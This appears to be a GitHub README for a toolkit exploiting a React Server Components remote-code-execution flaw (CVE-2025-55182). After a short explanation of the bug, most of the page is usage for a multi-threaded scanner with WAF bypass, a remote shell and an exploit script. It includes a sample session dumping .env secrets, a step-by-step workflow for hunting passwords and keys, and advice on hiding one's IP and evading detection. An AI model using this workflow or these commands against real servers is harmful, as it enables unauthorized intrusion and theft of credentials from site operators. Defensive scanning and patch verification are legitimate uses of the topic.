RSC-Scanner-Toolkit (CVE-2025-55182 & CVE-2025-66478)

date

Dec 3, 2025

slug

RSC-Scanner-Toolkit

status

Published

What Happened

On December 3, 2025, a critical vulnerability in React Server Components shocked the web development community. React2Shell (CVE-2025-55182) was disclosed with a CVSS score of 10.0 — the maximum severity rating for a vulnerability. The bug allowed remote code execution (RCE) on any server running React Server Components (RSC). Within hours of disclosure, Chinese state-sponsored groups and cryptomining operations began exploiting vulnerable servers in the wild.

Understanding React Server Components and React Flight

Traditionally, web applications had two architectural choices:

Server-side rendering (SSR): Render HTML on the server, send complete pages to the client

Client-side rendering (CSR): Send JavaScript bundles, render everything in the browser

React Server Components introduced a revolutionary third option:

Render components on the server with direct access to databases, file systems, and secret keys

Serialize the component tree into a compact format using the React Flight protocol

Stream it to the client without shipping large JavaScript bundles

Client "hydrates" the component tree and makes it interactive

Advantages of React Server Components

This hybrid approach combines the best of both worlds:

✅ Heavy computations (markdown parsing, data processing) can be done on the server

✅ Reduces client bundle size since less JavaScript needs to be shipped

✅ Progressive streaming — data can be streamed to the client as it becomes ready

✅ Improved perceived performance by the user

All of this is powered by a new protocol built specifically for React Server Components called React Flight.

The Vulnerability

The React Flight protocol had a critical flaw in how it handled serialized data. Attackers could craft malicious payloads that, when deserialized by the server, would execute arbitrary code. This vulnerability affected:

Next.js applications using App Router (React Server Components)

Any framework implementing React Server Components

Both development and production environments

CVE-2025-55182 and CVE-2025-66478 represent one of the most severe vulnerabilities in modern web development frameworks, with widespread impact across thousands of production applications.

Lessons Learned

Serialization is dangerous — Never trust deserialized data from untrusted sources

Defense in depth — Multiple layers of security are essential

Rapid response matters — Attackers began exploitation within hours of disclosure

Supply chain risk — Framework-level vulnerabilities affect entire ecosystems

Security testing is critical — Tools like RSC-Scanner help identify vulnerable systems before attackers do

✨ Features

🔍 Vulnerability Scanner (main.py)

Multi-threaded scanning for fast detection across large networks

Safe-check mode using side-channel detection (no RCE payload)

Custom path testing for comprehensive coverage

WAF bypass techniques for evading security controls

JSON output for integration with other tools

Detailed logging with verbose and quiet modes

💻 Interactive Remote Shell (shell.py)

Full command execution with support for complex commands, pipes, and arguments

Interactive shell experience with persistent working directory

Built-in commands (cd, exit, help, clear)

Base64 encoding for reliable output handling

Single command mode for scripting and automation

🎯 Advanced Exploitation (exploit.py)

Alternative exploitation method with different payload strategies

Windows PowerShell support for Windows-based targets

Custom command injection with flexible payload generation

Error handling and debugging for troubleshooting

📦 Installation

Prerequisites

Python 3.9 or higher

pip package manager

Install Dependencies


# Clone or download the repository
git clone https://github.com/follow-prince/RSC-Scanner-Toolkit.git
cd RSC-Scanner-Toolkit

# Install required packages
pip install "requests>=2.28.0" "tqdm>=4.64.0"

Verify Installation


python3 main.py --help
python3 shell.py --help
python3 exploit.py --help

🚀 Quick Start

Step 1: Scan for Vulnerabilities


# Scan a single target
python3 main.py -u <https://example.com>

# Scan multiple targets from a file
python3 main.py -l hosts.txt -t 20 -o results.json

# Safe check mode (no RCE payload, side-channel detection only)
python3 main.py -u <https://example.com> --safe-check

Step 2: Exploit Vulnerable Targets

Once you identify a vulnerable target, use the interactive shell:


# Start interactive shell
python3 shell.py -u <https://vulnerable-target.com>

# Execute a single command
python3 shell.py -u <https://vulnerable-target.com> -c "whoami"

Step 3: Gather Intelligence


# In the interactive shell
shell$ whoami
shell$ pwd
shell$ ls -la
shell$ cat .env
shell$ env
shell$ exit

📖 Detailed Usage

Scanner (main.py)

The scanner is designed to detect vulnerable React Server Components implementations across single or multiple targets.

Command-Line Options

Basic Options:

u, --url URL — Scan a single URL

l, --list FILE — Scan hosts from a file (one per line)

t, --threads N — Number of concurrent threads (default: 10)

-timeout SECONDS — Request timeout in seconds (default: 10)

o, --output FILE — Save results to JSON file

k, --insecure — Disable SSL certificate verification

v, --verbose — Enable verbose output with detailed information

q, --quiet — Only show vulnerable hosts (suppress non-vulnerable results)

Advanced Options:

-safe-check — Use safe side-channel detection (no RCE payload)

-windows — Use Windows PowerShell payload instead of bash

-waf-bypass — Add junk data to bypass Web Application Firewalls

-waf-bypass-size-kb N — Size of junk data in KB (default: 128)

-path PATH — Test custom paths (can be specified multiple times)

-path-file FILE — Load paths from a file

H, --header "Key: Value" — Add custom HTTP headers (can be specified multiple times)

Usage Examples

Basic Scanning:


# Scan a single target
python3 main.py -u <https://example.com>

# Scan with verbose output
python3 main.py -u <https://example.com> -v

# Quiet mode (only show vulnerable hosts)
python3 main.py -l hosts.txt -q

Advanced Scanning:


# Multi-threaded scan with results saved to JSON
python3 main.py -l hosts.txt -t 50 -o results.json

# Scan specific paths
python3 main.py -u <https://example.com> --path /_next --path /api --path /dashboard

# Load paths from file
python3 main.py -u <https://example.com> --path-file paths.txt

# WAF bypass mode with custom junk size
python3 main.py -u <https://example.com> --waf-bypass --waf-bypass-size-kb 256

# Custom headers for authenticated scanning
python3 main.py -u <https://example.com> -H "Authorization: Bearer token123" -H "X-API-Key: secret"

# Disable SSL verification for self-signed certificates
python3 main.py -u <https://localhost:3000> -k

Safe Check Mode:


# Use side-channel detection without executing RCE payload
python3 main.py -u <https://example.com> --safe-check

# Safe check with multiple targets
python3 main.py -l hosts.txt --safe-check -o safe-results.json

Output Format

Console Output:


[+] Vulnerable: <https://example.com>
    Path: /_next
    Method: RCE Check
    Digest: sha256:abc123...

JSON Output (-o results.json):


[
  {
    "host": "<https://example.com>",
    "vulnerable": true,
    "path": "/_next",
    "method": "rce_check",
    "digest": "sha256:abc123...",
    "timestamp": "2025-12-27T10:30:45"
  }
]

Interactive Shell (shell.py)

The interactive shell provides a command-line interface for executing commands on vulnerable targets.

Command-Line Options

u, --url URL — Target URL (required)

c, --command CMD — Execute a single command and exit

-timeout SECONDS — Request timeout (default: 10)

k, --insecure — Disable SSL certificate verification

Interactive Mode


# Start interactive shell
python3 shell.py -u <https://vulnerable-target.com>

Shell Features:

Persistent working directory — cd command changes directory for subsequent commands

Command history — Use arrow keys to navigate command history

Tab completion — (if supported by your terminal)

Color-coded output — Easy-to-read prompt and error messages

Example Session:


shell:/app$ whoami
node

shell:/app$ pwd
/app

shell:/app$ ls -la
total 48
drwxr-xr-x 1 node node 4096 Dec 27 10:00 .
drwxr-xr-x 1 root root 4096 Dec 27 09:00 ..
-rw-r--r-- 1 node node  256 Dec 27 10:00 .env
-rw-r--r-- 1 node node 1024 Dec 27 10:00 package.json
drwxr-xr-x 2 node node 4096 Dec 27 10:00 src

shell:/app$ cat .env
DATABASE_URL=postgresql://user:pass@localhost/db
API_KEY=secret123

shell:/app$ cd src

shell:/app/src$ pwd
/app/src

shell:/app/src$ exit

Built-in Commands

exit or quit — Exit the shell

help — Show help message

clear — Clear the screen

cd <directory> — Change working directory

Single Command Mode

Execute a single command without entering interactive mode:


# Get current user
python3 shell.py -u <https://vulnerable-target.com> -c "whoami"

# List files
python3 shell.py -u <https://vulnerable-target.com> -c "ls -la"

# Read sensitive files
python3 shell.py -u <https://vulnerable-target.com> -c "cat .env"

# Complex commands with pipes
python3 shell.py -u <https://vulnerable-target.com> -c "ps aux | grep node"

# Command chaining
python3 shell.py -u <https://vulnerable-target.com> -c "pwd && whoami && hostname"

Supported Command Types

✅ Simple commands: whoami, pwd, hostname, id

✅ Commands with arguments: ls -la, cat file.txt, find . -name "*.json"

✅ Pipes: ps aux | grep node, cat file.txt | wc -l

✅ Command chaining: pwd && whoami && hostname

✅ Redirects: echo "test" > file.txt

✅ Environment variables: env, echo $PATH

Advanced Exploit (exploit.py)

An alternative exploitation tool with different payload strategies.

Command-Line Options

u, --url URL — Target URL (required)

c, --command CMD — Execute a single command

-timeout SECONDS — Request timeout (default: 10)

k, --insecure — Disable SSL certificate verification

-windows — Use Windows PowerShell payload

Usage Examples


# Interactive shell
python3 exploit.py -u <https://vulnerable-target.com>

# Single command execution
python3 exploit.py -u <https://vulnerable-target.com> -c "whoami"

# Windows target
python3 exploit.py -u <https://vulnerable-target.com> --windows -c "whoami"

📝 Sample Files

hosts.txt Format

Create a file with one host per line. Comments and blank lines are ignored.


# Production servers
<https://example.com>
<https://app.example.com>

# Staging environments
<https://staging.example.com>

# Development servers
<http://localhost:3000>
<http://192.168.1.100:3000>

# Domains without scheme (will default to https://)
example.org
test.example.net

paths.txt Format

Create a file with one path per line to test specific endpoints.


# Common Next.js paths
/_next
/_next/data
/_next/static

# API endpoints
/api
/api/auth
/api/users

# Application paths
/dashboard
/admin
/app
/settings

🎯 Example Workflow

Complete Penetration Testing Workflow


# Step 1: Scan for vulnerabilities across your target list
python3 main.py -l hosts.txt -t 30 -o results.json -v

# Step 2: Review the results
cat results.json | grep '"vulnerable": true'

# Step 3: Connect to a vulnerable target
python3 shell.py -u <https://vulnerable-target.com>

# Step 4: Gather system information
shell$ whoami
shell$ pwd
shell$ hostname
shell$ id
shell$ uname -a

# Step 5: Enumerate environment
shell$ env
shell$ cat .env
shell$ cat package.json
shell$ cat next.config.ts

# Step 6: Explore file system
shell$ ls -la
shell$ find . -name "*.env"
shell$ find . -name "*.json"

# Step 7: Check running processes
shell$ ps aux | grep node
shell$ netstat -tulpn

# Step 8: Look for sensitive data
shell$ cat .env
shell$ cat config/database.yml
shell$ find . -name "*secret*"
shell$ find . -name "*key*"

# Step 9: Exit
shell$ exit

🛠️ Troubleshooting

Common Issues and Solutions

Issue: "Request timed out"

Possible Causes:

Target server is slow or overloaded

Network latency issues

Target may be patched

Solutions:


# Increase timeout
python3 main.py -u <https://example.com> --timeout 30

# For shell
python3 shell.py -u <https://example.com> --timeout 20

Issue: "SSL Error" or "Certificate Verify Failed"

Cause: Self-signed certificates or SSL verification issues

Solution:


# Disable SSL verification
python3 main.py -u <https://localhost:3000> -k
python3 shell.py -u <https://localhost:3000> -k

Issue: "No digest found" or "Not vulnerable"

Possible Causes:

Target is not vulnerable

Target is patched

Wrong path being tested

Solutions:


# Try different paths
python3 main.py -u <https://example.com> --path /_next --path /api --path /dashboard

# Use path file
python3 main.py -u <https://example.com> --path-file paths.txt

# Try safe check mode
python3 main.py -u <https://example.com> --safe-check

Issue: "Decode error" or "Invalid output"

Possible Causes:

Command output contains binary data

Encoding issues

Solutions:


# Try simpler commands first
shell$ whoami
shell$ pwd

# Avoid commands that output binary data
# Instead of: cat /bin/bash
# Use: file /bin/bash

Issue: "Connection refused"

Possible Causes:

Target is down

Firewall blocking connection

Wrong URL

Solutions:


# Verify the target is accessible
curl -I <https://example.com>

# Check if port is open
nc -zv example.com 443

# Try different URL format
python3 main.py -u <http://example.com>  # instead of https://

Issue: Commands not executing in shell

Possible Causes:

Target environment restrictions

Command syntax issues

Solutions:


# Use absolute paths
shell$ /bin/ls -la

# Try alternative commands
# Instead of: ls
# Try: echo *

# Check shell type
shell$ echo $SHELL

💡 Best Practices

Reconnaissance Phase

Start with safe checks to avoid detection:


python3 main.py -l hosts.txt --safe-check -o safe-results.json

Use multiple threads for large scans:


python3 main.py -l large-hosts.txt -t 50 -o results.json

Test multiple paths for comprehensive coverage:


python3 main.py -u <https://example.com> --path-file paths.txt

Exploitation Phase

Start with basic enumeration:


whoami
pwd
hostname
id

Check environment variables for secrets:


env
cat .env
printenv

Explore application structure:


ls -la
cat package.json
cat next.config.ts
find . -name "*.config.*"

Identify running processes:


ps aux | grep node
ps aux | grep npm
netstat -tulpn

Search for sensitive data:


find . -name "*.env"
find . -name "*secret*"
find . -name "*key*"
grep -r "password" .
grep -r "api_key" .

Operational Security

Use VPN or proxy to hide your source IP

Throttle requests to avoid detection:


python3 main.py -l hosts.txt -t 5 --timeout 15

Clean up artifacts after testing

Document findings for reporting

Follow responsible disclosure practices

Recommended Command Sequence

Execute these commands in order for systematic enumeration:


# 1. Basic system information
whoami
pwd
hostname
id
uname -a

# 2. Environment variables and secrets
env
cat .env
printenv

# 3. Application structure
ls -la
cat package.json
cat next.config.ts
cat next.config.js

# 4. Process and network information
ps aux | grep node
netstat -tulpn
lsof -i

# 5. File system exploration
find . -name "*.env"
find . -name "*.json"
find . -name "*config*"

# 6. System information
cat /etc/os-release
cat /proc/version
df -h
free -h

📚 References

Vulnerability Information

CVE-2025-55182 — React Server Components RCE vulnerability

CVE-2025-66478 — Related React Flight protocol vulnerability

CVSS Score: 10.0 (Critical)

Disclosure Date: December 3, 2025

Research and Analysis

Assetnote Security Research Team — Original vulnerability research

React Server Components Documentation

Next.js App Router Documentation

React Flight Protocol Specification

Security Resources

OWASP Top 10

CWE-502: Deserialization of Untrusted Data

NIST National Vulnerability Database

⚖️ Disclaimer

IMPORTANT: READ CAREFULLY BEFORE USE

This toolkit is provided for educational and authorized security testing purposes only.

Legal Notice

✅ Authorized Use: Only test systems you own or have explicit written permission to test

❌ Unauthorized Use: Unauthorized access to computer systems is illegal under:

Computer Fraud and Abuse Act (CFAA) in the United States
Computer Misuse Act in the United Kingdom
Similar laws in other jurisdictions worldwide

Ethical Guidelines

Obtain written authorization before testing any system

Respect scope limitations defined in your authorization

Follow responsible disclosure practices for any vulnerabilities found

Do not cause harm or disrupt services

Protect confidential data discovered during testing

Document all activities for transparency and accountability

Liability

The authors and contributors of this toolkit:

Are not responsible for any misuse or damage caused by this software

Provide this software "as is" without warranty of any kind

Strongly condemn any malicious or unauthorized use

Responsible Disclosure

If you discover vulnerabilities using this toolkit:

Do not exploit beyond proof-of-concept

Notify the vendor immediately through proper channels

Allow reasonable time for patching (typically 90 days)

Coordinate disclosure with the vendor

Publish responsibly after patches are available

📧 Contact

For security issues, responsible disclosure, or questions:

Security Issues: Please report privately to the maintainers

General Questions: Open an issue on GitHub

Research Collaboration: Contact through official channels

🙏 Acknowledgments

Assetnote Security Research Team for discovering and responsibly disclosing CVE-2025-55182

React and Next.js teams for rapid response and patching

Security research community for ongoing vulnerability research and responsible disclosure

⚠️ Remember: With great power comes great responsibility. Use this toolkit ethically and legally.